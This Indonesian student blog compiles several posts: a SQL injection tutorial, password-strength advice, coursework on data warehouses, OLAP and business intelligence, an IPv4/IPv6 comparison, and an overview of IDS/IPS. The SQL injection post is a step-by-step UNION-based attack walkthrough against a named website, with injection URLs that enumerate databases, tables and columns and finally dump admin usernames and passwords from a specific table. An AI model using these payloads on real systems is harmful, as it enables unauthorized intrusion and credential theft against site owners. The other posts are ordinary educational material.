Powered By Blogger

Sabtu, 09 Februari 2013

SQL Injection


SQL Injection adalah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah palikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter – karakter pelolos bentung string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. ini sebanarnya adalah sebiah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat bterjadi setiap kali senbuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.
Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus — yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
Berbahaya SQL Injection :
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Statement sql bukanlah bahasa pemrograman seperti pascal,Delphi atau visual basic , statemen sql biasanya digunakan bersama sama dengan bahasa pemrograman lain saat mengakses database pada  untuk mencocokan user yang login , maka digunakan statemen sql yang kurang lebih sebagai berikut ;
Select * from admin where username = input_username
And password = input_password 
Sebagai contoh apabila penulis sebagai administrator dengan username = administrator dan password = admin bermaksud login maka sql statemennya sebagai berikut
Select * from admin where username = ‘administrator’ and
Password = ‘admin’
setelah mendapatkan alamat target kita cek dahulu adanya bug mysql dengan menambahkan ‘ pada akrih URL
contoh : http://www.ciputatbisnis.com/news.php?id=82′
selanjtnya menemukan jumlah kolom pada URL, dengan pernyataan “order by” dan angka di akrihnya
contoh : http://www.ciputatbisnis.com/news.php?id=82 order by 1 s/d seterusnya sampai menemukan error, errror tersebut membuktikan bahwa url tersebut hanya memiliki kolom sedikit.
Setelah kita mengetahui jumlah kolom yang terdapat pada table database, selanjutnya kita akan mencari informasi & data apa yang bisa diambil dari sana.
untuk  melakukan hal tersebut kita menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL.
Finding MySQL Database Version, Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database.
Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version”
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata”
contoh: http://www.ciputatbisnis.com/news.php?id=-82+UNION+SELECT+concat(database()),2,3,4,5,6,7
Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
contoh:http://www.ciputatbisnis.com/news.php?id=-82 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()
Menemukan Nama Kolom Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
contoh :http://www.ciputatbisnis.com/news.php?id=-82 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()
Mengambil Informasi Database Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana.
contoh :http://www.ciputatbisnis.com/news.php?id=-82 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename
Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
contoh: http://www.ciputatbisnis.com/news.php?id=-82 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin
referensi :

Cek Kekuatan Password


pengertian password
Password adalah kode rahasia, kata sandi yang merupakan kunci untuk bisa mengakses atau membuka suatu sistem yang dikunci. Password juga bisa disebut dengan kunci.
Password merupakan rahasia, jika ada orang lain yang mengetahui password tersebut, bisa jadi orang yang tidak berhak tersebut akan menghapus atau mencuri berkas-berkas yang ada. Jadi sebaiknya dalam selang waktu tertentu password sebaiknya diganti dan agar kerahasiaannya terjamin, sebaiknya hal-hal berikut ini tidak digunakan :
Nama atau nama panggilan
nama orang tua, pacar, saudara atau orang dekat
sesuatu yang mudah ditebak, seperti nama kota, jenis musik yang disukai oleh orang yang mempunyai password tersebut
Password yang baik adalah password yang susah ditebak oleh orang lain dan mudah diingat oleh Anda dan hal-hal yang disarankan:
Menggunakan kombinasi huruf besar dan huruf kecil
Mengandung angka dan karakter tanda baca (seperti ?,! dll)
Panjangnya minimal 6 karakter lebih panjang lebih baik
dan update password anda minimal 2 minggu sekali.

flowmap cek kekuatan password :



Senin, 28 Januari 2013

TUGAS KAPSEL


Nama  :  Sendy Erlangga

Kelas   : TI/3B (1103082)


Terminologi Data Warehouse, Data Mart, Data Mining, OLAP(On-Line Analytical Processing), MOLAP, ROLAP, HOLAP (Keuntungan, Kekurangan, dan Deskripsi)

Data Warehouse
Ada beberapa ahli yang menyampaikan tentang pengertian Data Warehouse, yaitu :
  1. Menurut W.H. Inmon dan Richard D.H., data warehouse adalah koleksi data yang mempunyai sifat berorientasi subjek,terintegrasi,time-variant, dan bersifat tetap dari koleksi data dalam mendukung proses pengambilan keputusan management.
  2. Menurut Vidette Poe, data warehouse merupakan database yang bersifat analisis dan read only yang digunakan sebagai fondasi dari sistem penunjang keputusan.
  3. Menurut Paul Lane, data warehouse merupakan database relasional yang didesain lebih kepada query dan analisa dari pada proses transaksi, biasanya mengandung history data dari proses transaksi dan bisa juga data dari sumber lainnya. Data warehouse memisahkan beban kerja analisis dari beban kerja transaksi dan memungkinkan organisasi menggabung/konsolidasi data dari berbagai macam sumber.
   Jadi, Data Warehouse merupakan  motode dalam perancangan database yang menunjang DSS (Decission Support System) dan EIS (Executive Information System).  Data warehouse adalah database yang berisi data dari beberapa system operasional yang terintegrasi dan terstruktur sehingga dapat digunakan untuk mendukung analisa dan proses pengambilan keputusan dalam bisnis. Data warehouse didesain untuk dapat melakukan query dengan cepat. Informasi diturunkan dari data lain, dilakukan rolling up untuk dijadikan ringkasan, dilakukan operasi drilling down untuk mendapatkan informasi lebih detail, atau melihat pola yang menarik atau melihat trend (kecenderungan).
Istilah-istilah yang berkaitan dengan data warehouse :
  1. Data Mart
  2. Data Mining
  3. On-Line Analytical Processing(OLAP)
Keuntungan Data Warehouse
Data warehouse merupakan pendekatan untuk menyimpan data dimana sumber-sumber data yang heterogen(yang biasanya tersebar pada beberapa database (OLTP) dimigrasikan untuk penyimpanan data yang homogen dan terpisah. Keuntungan dengan menggunakan data warehouse adalah :
  1. Data diorganisir dengan baik untuk query analisis dan sebagai bahan untuk pemrosesan transaksi.
  2. Perbedaan diantara struktur data yang heterogen pada beberapa sumber yang terpisah dapat diatasi.
  3. Aturan untuk transformasi data diterapkan untuk memvalidasi dan mengkonsolidasi data apabila data dipindahkan dari database OLTP ke data warehouse.
  4. Masalah keamanan dan kinerja bisa dipecahkan tanpa perlu mengubah sistem produksi.
Data Mart
   Data Mart adalah  bagian pada data warehouse yang mendukung pembuatan laporan dan analisa data pada suatu unit, bagian atau operasional pada suatu persahaan. Data mart sering digunakan untuk memberikan informasi kepada segmen fungsional organisasi.
Karakteristik Data Mart
  • Data mart memfokuskan hanya pada kebutuhan-kebutuhan pemakai yang terkait dalam sebuah departemen atau fungsi bisnis.
  • Data mart biasanya tidak mengandung data operasional yang rinci seperti pada data warehouse.
  • Data mart hanya mengandung sedikit informasi dibandingkan dengan data warehouse. Data mart lebih mudah dipahami.
perbedaan

Keutungan dan Kelemahan Data Mart :
 Keuntungan Data Mart, sebagai berikut:
  1. Akses mudah ke data yang sering digunakan
  2. Penciptaan pandang kolektif untuk sekelompok pengguna
  3. Peningkatan respon-time dari pengguna akhir
  4. Fleksibel dan mudah cara pembuatan
  5. Lebih hemat biaya daripada Data warehouse
  6. Definisi pengguna lebih jelas dari sebuah gudang data.
Kelemahan Data Mart, sebagai berikut :
  1. Tidak bisa sepenuhnya menilai kinerja LAN berbasis sistem manajemen database sementara port dari satu lingkungan yang lain.
  2. Dapat mendukung kelompok-kelompok pengguna kecil atau sederhana sumber data, yang tidak ideal untuk aplikasi perangkat lunak didistribusikan dan pengembangan skala besar Perusahaan-lebar sistem manajemen database
Data Mining
   Data mining adalah serangkaian proses untuk menggali nilai tambah berupa informasi yang selama ini tidak diketahui secara manual dari suatu basisdata dengan melakukan penggalian pola pola dari data dengan tujuan untuk memanipulasi data menjadi informasi yang lebih berharga yang diperoleh dengan cara mengekstrasi dan mengenali pola yang penting atau menarik dari data yang terdapat dalam basis data.
OLAP (Online Analytical Processing)
   OLAP adalah Pemrosesan database yang menggunakan tabel fakta dan dimensi untuk dapat menampilkan berbagai macam bentuk laporan analisis query transaksi sehari-hari.
Keuntungan OLAP
  • Meningkatkan produktifitas pemakai akhir bisnis, pengembang IT, dan keseluruhan organisasi. Pengawasan yang lebih dan akses tepat waktu terhadap informasi strategis dapat membuat pengambilan keputusan lebih efektif.
  • Mengurangi “backlog” pengembangan aplikasi bagi staf IT dengan membuat pemakai akhir dapat merubah schema dan membangun model sendiri.
MOLAP (Multi Dimensional OLAP)
MOLAP adalah tipe OLAP yang memiliki storage sendiri, yang isinya merupakan precomputed agregasi data – sum, count, min, max, dan sebagainya – yang terlibat pada berbagai level detil. Storage ini berupa format yang hanya dikenali oleh MOLAP server tersebut dan telah khusus dioptimalkan untuk penggunaan oleh aplikasi tersebut.
MOLAP
Cara kerja MOLAP secara umum dibagi ke dalam dua tahap sebagai berikut :
  • Tahap konstruksi dan populasi data, pada tahap ini sumber data akan dibaca, dilakukan perhitungan agegrasi (summary group) pada berbagai level dimensi, dan hasilnya akan disimpan di storage MOLAP. Jika objek data diperumpamakan dengantable, maka untuk satu cube akan banyak fragmen table yang isinya adalah detil agregasi dari level tertentu.
  • Tahap query atau layanan permintaan data analisis, pada tahap ini OLAP Server akan melayani permintaan query dari client dan membaca data dari storage MOLAP. Table yang akan dibaca adalah suatu fragmen yang akan disesuaikan dengan permintaan dari client. Pada fase query ini, jika OLAP Server terputus dengan data source tidak apa-apa karena sudah tidak ada kaitannya.
Keuntungan dari MOLAP ini yang paling jelas adalah performa kecepatan akses yang sangat baik. Namun kelemahannya adalah jika kombinasi agregasi data yang dihasilkan untuk semua level, maka ukuran penyimpanan akan bisa lebih besar daripada sumbernya sendiri.
ROLAP (Relational OLAP)
ROLAP adalah tipe OLAP yang bergantung kepada database relasional atau RDBMS (Relational Database Management System) sebagai media penyimpanan (storage) data yang akan diolah. Dengan strategi tersebut maka OLAP Server terhindar dari masalah pengelolaan data storage dan hanya menerjemahkan proses query analysis (MDX) ke relational query (SQL).  Otomatis proses optimasi ROLAP akan sangat ditentukan di sisi produk RDBMS yang digunakan misalkan dari sisi penanganan jumlah data dan strategi indexing.
ROLAP
Cara kerja ROLAP secara umum adalah sebagai berikut :
  • OLAP client mengirimkan query analisis ke OLAP Server.
  • OLAP server akan melakukan pemeriksaan di cache apakah sudah bisa melayani permintaan query dari client tersebut, jika sudah akan dikirimkan.
  • Jika pada cache belum terdapat data diminta, akan dilakukan query SQL ke data mart dan hasil eksekusinya disimpan di cache dan dikirimkan kepada client.
  • Demikian seterusnya.
  • Cache akan disimpan selama periode waktu tertentu dan akan dibersihkan total jika server dimatikan.
Keuntungan dari ROLAP ini adalah tidak memerlukan storage tambahan. Namunkelemahannya adalah  jika data untuk suatu cube sangat besar (masif) maka performa pengambilan data akan cukup buruk.
HOLAP (Hybrid OLAP)
HOLAP untuk mengatasi kelemahan dari ROLAP dan MOLAP, kelemahan tersebut adalah :
  • Performa ROLAP tidak begitu baik karena agregasi selalu dilakukan ulang apabila
cache sudah expired.
  • Keterbatasan storage dari MOLAP jika digunakan untuk menyimpan kombinasi agregasi pada semua level.
Jadi HOLAP merupakan kombinasi atau “jalan tengah” antara keduanya dimana HOLAP akan menyimpan data precomputed aggregate pada media penyimpanan (storage) HOLAP sendiri.
Yang disimpan pada storage HOLAP adalah data untuk beberapa level teratas atau high level view. Sedangkan untuk level yang lebih rendah atau lebih rinci akan disimpan di database relasional.
Business intelligence
Business intelligence Menurut Nadia Branon, Business Intelligence merupakan kategori yang umum digunakan untuk aplikasi dan teknologi untuk mengumpulkan, menyimpan, menganalisa, dan menyediakan akses pada data agar dapat membantu pengguna dari kalangan perusahaan agar dapat mengambil keputusan dengan lebih baik dan tepat. Pada umumnya solusi yang disediakan oleh BI berupa sumber-sumber data dimana data yang sifatnya transaksional dikumpulkan, data warehouses/data marts, reporting dan alat visualisasi, seperti analisis prediksi dan modelling.
Komponen-Komponen Business intelligence
  1. Data Operasional
    • Customer
    • Inventory
    • Credit
    • Sales
    • Operational
    • External
  2. ETL
  3. Data Warehouse
  4. Data Mining
  5. OLAP (On-Line Analytical Processing)
  6. OLTP (On-Line Transaction Processing)
Manfaat dan Keuntungan mengimplementasikan Business Intelligence
1. Meningkatkan Profit
Mengapa dapat meningkatkan profit? Bagi perusahaan atau organisasi yang mengimplementasikan Business Intelligence, dapat membantu pebisnis dalam mengevaluasi para pelanggannya. Dengan Business Intelligence, perusahaan dapat mengetahui pelanggannya, berapa pelanggan yang kita punyai, apakah pelanggan dapat menghasilkan keuntungan secara jangka panjang atau pelanggan tersebut hanya menguntungkan dalam jangka pendek saja. Dengan Business Intelligence pebisnis memanfaatkan keuntungan ini, pebisnis dapat meningkatkan layanannya untuk menjawab kebutuhan-kebutuhan dari pelanggan. Maka dengan demikian pelanggan pun akan puas akan pelayanan yang diberikan dan menjadikan nilai lebih bagi perusahaan yang mengimplementasikan Business Intelligence, secara otomatis juga profit perusahaan semakin meningkat.
2. Menurunkan Biaya
Dalam mengimplementasikan Business Intelligence dalam suatu perusahaan atau organisasi, secara tidak langsung akan menurunkan beberapa biaya yang juga menjadi beban bagi organisasi tersebut. Seperti menurunkan biaya operasional yang berlebih, biaya pencarian pelanggan baru, karena dengan Business Intelligence perusahaan dapat mengetahui informasi pelanggan lama yang berpotensial dalam perusahaan, cukup meningkatkan pelayanan kepada tersebut, dibandingkan kita harus mengeluarkan biaya untuk pelanggan baru yang kita belum mengenal potensi pelanggan baru. Business Intelligence dapat membantu mengevaluiasi biaya organisasi yang dikeluarkan.
3. Meningkatkan Pemasaran
Di dalam persaingan bisnis yang semakin memanas, banyak perusahaan besar menerapkan Business Intelligence untuk bertahan dalam persaingan bisnis karena dapat dimanfaatkan untuk mengevaluasi, menganalisis pelanggan. Dengan demikian pula perusahaan dapat mengetahui pangsa pasar yang produktif serta menguntungkan bagi  perusahaan, sehingga perusahaan dapat tetap bartahan dalam mempertahankan pasarnya bahkan memperluas pemasarannya. Ini menjadikan suatu strategi bagi perusahaan tersebut.
4. Mempermudah Pengambilan Keputusan
   Business Intelligence sering kali digunakan untuk membantu dalam pengambilan keputusan. Business Intelligence memanfaatkan dan menganalisis data, informasi dan pengetahuan untuk memberikan nilai tersendiri bagi perusahaan serta membantunya dalam pengambilan keputusan. Business Intelligence mampu memberikan solusi melalui informasi yang diperoleh dari perusahaan itu sendiri. Suatu data yang pada awalnya tidak dapat membantu dalam pengambilan keputusan, dengan Business Intelligence data atau informasi yang ada dapat di terintegrasikan dan mudah dimengerti. Dengan demikian, Business Intelligence membantu perusahaan agar dapat mengambil keputusan yang tepat karena pemanfaatan informasi yang baik.
Tantangan dan Kerugian Mengimplementasikan Business Intelligence
1. Membutuhkan banyak data
Biasanya implementasi Business Intelligence diterapkan pada perusahaan besar, dalam artian perusahaan yang memiliki data transaksi yang banyak, dengan demikian untuk mendapatkan data yang besar maka dibutuhkan pula waktu yang cukup lama, biasanya perusahaan sudah berdiri 5-10tahun lebih sehingga memiliki data yang cukup banyak. Ini menjadi suatu tantangan bagi perusahaan yang memiliki data transaksi kecil, karena jika ingin mendapatkan data yang besar harus menunggu waktu yang cukup lama menjadikannya tidak efektif untuk meningkatkan perusahaan kecil.
2. Perubahan Budaya Perusahaan
Banyak perusahaan yang tidak bisa menerima perubahan budaya yang terjadi pada perusahaanya. Maka ini menjadi suatu tantangan bagi perusahaan dalam mengubah budaya lama pada perusahaan menjadi budaya baru yakni dalam mengimplementasikan Business Intelligence. Perusahaan yang pada awalnya memiliki data, informasi yang tidak di olah dengan baik, dengan Business Intelligence data tersebut diolah sebaik mungkin agar memiliki nilai bagi perusahaanya. Dibutuhkan juga pekerja yang intelektual untuk dapat mengolah data dan informasi dengan baik.
3. Resiko Kegagalan
Dalam mengimplementasi apapun pasti memiliki resiko, resiko ini menjadi suatu tantangan maupun kerugian bagi suatu perusahaan. Business Intelligence dibutuhkan untuk mengolah data, informasi dan pengetahuan agar menjadi bermanfaat bagi perusahaan. Memiliki resiko kegagalan yang cukup riskan dalam mengolah data dan informasi, mengapa? Karena data dan informasi yang diolah itu cukup banyak dan akibat data yang sangat banyak maka pengumpulan datanya pun tidak teratur, cukup rumit untuk diolah. Sehingga dapat menyebabkan adanya resiko kegagalan yang akan terjadi jika tidak dikelola dengan sebaik mungkin.
contoh perusahaan yang menggunakan business intelligence :
1. United Pipe & Supply Co.
2. PT. Adaro Energy Tbk
3. PT. INTEGRITY INDONESIA

Sabtu, 12 Januari 2013

Perbedaan IPV4 dan IPV6

Perbedaan Internet Protokol Versi 4  (IPv4)  dan  Internet Protokol Versi 6 (IPv6)
  
I. Internet Protokol Versi 4 (IPv4)
IPv4 adalah sebuah jenis pengalamatan jaringan yang digunakan di dalam protokol
jaringan TCP/IP yang menggunakan protokol IP versi 4. IP versi ini memiliki keterbatasan
yakni hanya mampu mengalamati sebanyak 4 miliar host komputer di seluruh dunia.
Contoh alamat IPv4 adalah 192.168.0.3
Pada IPv4 ada 3 jenis Kelas, tergantung dari besarnya bagian host, yaitu kelas A (bagian
host sepanjang 24 bit , IP address dapat diberikan pada 16,7 juta host) , kelas B (bagian host
sepanjang 16 bit = 65534 host) dan kelas C (bagian host sepanjang 8 bit = 254 host ).
Administrator jaringan mengajukan permohonan jenis kelas berdasarkan skala jaringan yang
dikelolanya. Konsep kelas ini memiliki keuntungan yaitu : pengelolaan rute informasi tidak
memerlukan seluruh 32 bit tersebut, melainkan cukup hanya bagian jaringannya saja, sehingga
besar informasi rute yang disimpan di router, menjadi kecil. Setelah address jaringan diperoleh,
maka organisasi tersebut dapat secara bebas memberikan address bagian host pada masingmasing
hostnya.
Perbandingan IPv4 dan IPv6
Pemberian alamat dalam internet mengikuti format IP address (RFC 1166). Alamat ini
dinyatakan dengan 32 bit (bilangan 1 dan 0) yang dibagi atas 4 kelompok (setiap kelompok
terdiri dari 8 bit atau oktet) dan tiap kelompok dipisahkan oleh sebuah tanda titik. Untuk
memudahkan pembacaan, penulisan alamat dilakukan dengan angka desimal, misalnya
100.3.1.100 yang jika dinyatakan dalam binary menjadi
01100100.00000011.00000001.01100100. Dari 32 bit ini berarti banyaknya jumlah maksimum
alamat yang dapat dituliskan adalah 2 pangkat 32, atau 4.294.967.296 alamat. Format alamat ini
terdiri dari 2 bagian, netid dan hostid. Netid sendiri menyatakan alamat jaringan sedangkan
hostid menyatakan alamat lokal (host/router). Dari 32 bit ini, tidak boleh semuanya angka 0 atau
1 (0.0.0.0 digunakan untuk jaringan yang tidak dikenal dan 255.255.255.255 digunakan untuk
broadcast). Dalam penerapannya, alamat internet ini diklasifikasikan ke dalam kelas (A-E)..
Alasan klasifikasi ini antara lain :
· Memudahkan sistem pengelolaan dan pengaturan alamat-alamat.
· Memanfaatkan jumlah alamat yang ada secara optimum (tidak ada alamat yang
terlewat).
· Memudahkan pengorganisasian jaringan di seluruh dunia dengan membedakan jaringan
tersebut termasuk kategori besar, menengah, atau kecil.
· Membedakan antara alamat untuk jaringan dan alamat untuk host/router.
Pada tabel dibawah dijelaskan mengenai ketersediaan IPv4 berdasarkan data dari APNIC
sampai akhir tahun 1999 yang lalu dan total IP yang sudah dialokasikan ke tiap – tiap negara di
Asia Pasifik.


II.5 Internet Protokol Versi 6 (IPv6)
Transisi IPv4 ke IPv6 merupakan fenomena yang tidak dapat dielakan oleh semua
kalangan. Walaupun IPv4 tetap dapat digunakan, IPv6 memiliki versi design berbeda dan
memiliki kegunaan lebih dibanding IPv4. Disertai dengan tumbuhnya inovasi-inovasi perangkat
berteknologi, maka Negara-negara di dunia dituntut mampu bersaing atau setidaknya secara
bertahap mulai untuk mengimplementasikan IPv6. Menurut jurnal Internet Protocol,
diperkirakan tak sampai tahun 2011, jatah alamat IP yang masih belum digunakan saat ini akan
habis. Maka muncullah suatu metode peangalamatan baru yang dikenal dengan sebutan IPv6. Di
Indonesia, salah satu penyedia jasa Internet, Indosat Mega Media (Indosat M2), sejak 2004 telah
siap menyewakan jaringan IPv6 ini.
IPv6 merupakan metode pengalamatan IP yang perlahan-lahan mulai menggantikan IPv4.
IPv6 digunakan sebagai pengalamatan karena keterbatasan jumlah IP yang dimiliki oleh IPv4,
mengingat semakin bertambahnya perangkat berbasis IP saat ini. IPv6 atau Internet Protocol
version 6 adalah protokol Internet terbaru yang merupakan pengembangan lebih lanjut dari
protokol yang dipakai saat ini, IPv4 (Internet Protocol version 4). Pengalamatan IPv6
menggunakan 128-bit alamat yang jauh lebih banyak dibandingkan dengan pengalamatan 32-bit
milik IPv4. Dengan kapasitas alamat IP yang sangat besar pada IPv6, setiap perangkat yang
dapat terhubung ke Internet (komputer desktop, laptop, personal digital assistant, atau telepon
seluler GPRS/3G) bisa memiliki alamat IP yang tetap. Sehingga, cepat atau lambat setiap
perangkat elektronik yang ada dapat terhubung dengan Internet melalui alamat IP yang unik.
Protokol IPv6 ini memiliki beberapa fitur baru yang merupakan perbaikan dari IPv4,diantaranya
:
Memiliki format header baru
Header pada IPv6 memiliki format baru yang didesain untuk menjaga agar overhead header
minimum, dengan menghilangkan field-field yang tidak diperlukan serta beberapa field opsional
Perbandingan IPv4 dan IPv6
yang ditempatkan setelah header IPv6. Header IPv6 sendiri besarnya adalah dua kali dari besar
header dari IPv4.
•Range alamat yang sangat besar
IPv6 memiliki 128-bit atau 16-byte untuk masing-masing alamat IP source dan destination.
Sehingga secara logika IPv6 dapat menampung sekitar 3.4 x 1038 kemungkinan kombinasi
alamat.
•Pengalamatan secara efisien dan hierarkis serta infrastruktur routing
Alamat global dari IPv6 yang digunakan pada porsi IPv6 di Internet, didesain untuk
menciptakan infrastruktur routing yang efisien, hierarkis, dan mudah dipahami oleh
pengembang.
• Konfigurasi pengalamatan secara stateless dan statefull
IPv6 mendukung konfigurasi pengalamatan secara statefull, seperti konfigurasi alamat
menggunakan server DHCP, atau secara stateless yang tanpa menggunakan server DHCP. Pada
konfigurasi kedua, host secara otomatis mengkonfigurasi dirinya sendiri dengan alamat IPv6
untuk link yang disebut dengan alamat link-lokal dan alamat yang diturunkan dari prefik yang
ditransmisikan oleh router local.
Built-in security
Dukungan terhadap IPsec memberikan dukungan terhadap keamanan jaringan dan menawarkan
interoperabilitas antara implementasi IPv6 yang berbeda.
• Dukungan yang lebih baik dalam hal QoS
Pada header IPv6 terdapat trafik yang di identifikasi menggunakan field Flow Label, sehingga
dukungan QoS dapat tetap diimplementasikan meskipun payload paket terenkripsi melalui
IPsec.
• Protokol baru untuk interaksi node
Pada IPv6 terdapat Protokol Neighbor Discovery yang menggantikan Address Resolution
Protokol.
• EkstensibilitasIPv6 dapat dengan mudah ditambahkan fitur baru dengan menambahkan
header ekstensi setelah header IPv6. Ukuran dari header ekstensi IPv6 ini hanya terbatasi oleh
ukuran dari paket IPv6 itu sendiri.

Jumat, 26 Oktober 2012

Menganal IDS dan IPS pada Keamanan Jaringan

Pengertian Intrusion Detection System (IDS)
IDS (Intrusion Detection System) adalah "sebuah sistem yang melakukan pengawasan terhadap traffic jaringan dan pengawasan terhadap kegiatan-kegiatan yang mencurigakan didalam sebuah sistem jaringan"


Dari Kutipan Di atas dapat disimpulkan Bahwasannya di dalam traffic sebuah jaringan masih banyak yg harus di awasi untuk setiap keamanan nya,masih banyak para Hacker yg selalu merusak sebuah sistem keamanan jaringan.Maka dari itu IDS berfungsi melakukan pengawasan terhadap sebuah traffic jaringan dan pengawasan terhadap kegiatan2 yg mencurigakan.Selain itu IDS juga berfungsi memberi sebuah peringatan ketika terjadi sebuah penyerangan.




A.    Jenis-jenis IDS
NIDS (Network Intrusion Detection System)
IDS jenis ini ditempatkan disebuah tempat/ titik yang strategis atau sebuah titik didalam sebuah jaringan untuk melakukan pengawasan terhadap traffic yang menuju dan berasal dari semua alat-alat (devices) dalam jaringan. Idealnya semua traffic yang berasal dari luar dan dalam jaringan di lakukan di scan, namun cara ini dapat menyebabkan bottleneck yang mengganggu kecepatan akses di seluruh jaringan.


HIDS (Host Intrusion Detection System)
IDS jenis ini berjalan pada host yang berdiri sendiri atau perlengkapan dalam sebuah jaringan. Sebuah HIDS melakukan pengawasan terhadap paket-paket yang berasal dari dalam maupun dari luar hanya pada satu alat saja dan kemudian memberi peringatan kepada user atau administrator sistem jaringan akan adanya kegiatan-kegiatan yang mencurigakan yang terdeteksi oleh HIDS.

a)    SignatureBased
          IDS yang berbasis pada signature akan melakukan pengawasan terhadap paket-paket dalam jaringan dan melakukan pembandingan terhadap paket-paket tersebut dengan basis data signature yang dimiliki oleh sistem IDS ini atau atribut yang dimiliki oleh percobaan serangan yang pernah diketahui. Cara ini hampir sama dengan cara kerja aplikasi antivirus dalam melakukan deteksi terhadap malware. Intinya adalah akan terjadi keterlambatan antara terdeteksinya sebuah serangan di internet dengan signature yang digunakan untuk melakukan deteksi yang diimplementasikan didalam basis data IDS yang digunakan. Jadi bisa saja basis data signature yang digunakan dalam sistem IDS ini tidak mampu mendeteksi adanya sebuah percobaan serangan terhadap jaringan karena informasi jenis serangan ini tidak terdapat dalam basis data signature sistem IDS ini. Selama waktu keterlambatan tersebut sistem IDS tidak dapat mendeteksi adanya jenis serangan baru.

b)    AnomalyBased
         IDS jenis ini akan mengawasi traffic dalam jaringan dan melakukan perbandingan traffic yang terjadi dengan rata-rata traffic yang ada (stabil). Sistem akan melakukan  identifikasi apa yang dimaksud dengan jaringan “normal” dalam jaringan tersebut, berapa banyak bandwidth yang biasanya digunakan di jaringan tersebut, protolkol apa yang digunakan, port-port dan alat-alat apa saja yang biasanya saling berhubungan satu sama lain didalam jaringan tersebut, dan memberi peringatan kepada administrator ketika dideteksi ada yang tidak normal, atau secara signifikan berbeda dari kebiasaan yang ada.

c)    PassiveIDS
          IDS jenis ini hanya berfungsi sebagai pendeteksi dan pemberi peringatan. Ketika traffic yang  mencurigakan atau membahayakan terdeteksi oleh IDS maka IDS akan membangkitkan sistem pemberi peringatan yang dimiliki dan dikirimkan ke administrator atau user dan selanjutnya terserah kepada administrator apa tindakan yang akan dilakukan terhadap hasil laporan IDS.

d)    ReactiveIDS
         IDS jenis ini tidak hanya melakukan deteksi terhadap traffic yang mencurigakan dan membahayakan kemudian memberi peringatan kepada administrator tetapi juga mengambil tindakan proaktif untuk  merespon terhadap serangan yang ada. Biasanya dengan melakukan pemblokiran terhadap traffic jaringan selanjutnya dari alamat IP sumber atau user jika alamat IP sumber atau user tersebut mencoba  melakukan serangan lagi terhadap sistem jaringan di waktu selanjutnya.




B.    Implementasi IDS

         Salah satu contoh penerapan IDS di dunia nyata adalah dengan menerapkan sistem IDS yang bersifat open source dan gratis. Contohnya SNORT. Aplikasi Snort tersedia dalam beberapa macam platform dan sistem operasi termasuk Linux dan Window$. Snort memiliki banyak pemakai di jaringan karena selain gratis, Snort juga dilengkapi dengan support system di internet sehingga dapat dilakukan updating signature terhadap Snort yang ada sehingga dapat melakukan deteksi terhadap jenis serangan terbaru di internet.
IDS tidak dapat bekerja sendiri jika digunakan untuk mengamankan sebuah jaringan. IDS harus digunakan bersama-sama dengan firewall. Ada garis batas yang tegas antara firewall dan IDS.

C.    Cara kerja IDS

      Ada beberapa cara bagaimana IDS bekerja. Cara yang paling populer adalah dengan menggunakan pendeteksian berbasis signature (seperti halnya yang dilakukan oleh beberapa antivirus), yang melibatkan pencocokan lalu lintas jaringan dengan basis data yang berisi cara-cara serangan dan penyusupan yang sering dilakukan oleh penyerang. Sama seperti halnya antivirus, jenis ini membutuhkan pembaruan terhadap basis data signature IDS yang bersangkutan.
Metode selanjutnya adalah dengan mendeteksi adanya anomali, yang disebut sebagai Anomaly-based IDS. Jenis ini melibatkan pola lalu lintas yang mungkin merupakan sebuah serangan yang sedang dilakukan oleh penyerang. Umumnya, dilakukan dengan menggunakan teknik statistik untuk membandingkan lalu lintas yang sedang dipantau dengan lalu lintas normal yang biasa terjadi. Metode ini menawarkan kelebihan dibandingkan signature-based IDS, yakni ia dapat mendeteksi bentuk serangan yang baru dan belum terdapat di dalam basis data signature IDS. Kelemahannya, adalah jenis ini sering mengeluarkan pesan false positive. Sehingga tugas administrator menjadi lebih rumit, dengan harus memilah-milah mana yang merupakan serangan yang sebenarnya dari banyaknya laporan false positive yang muncul.
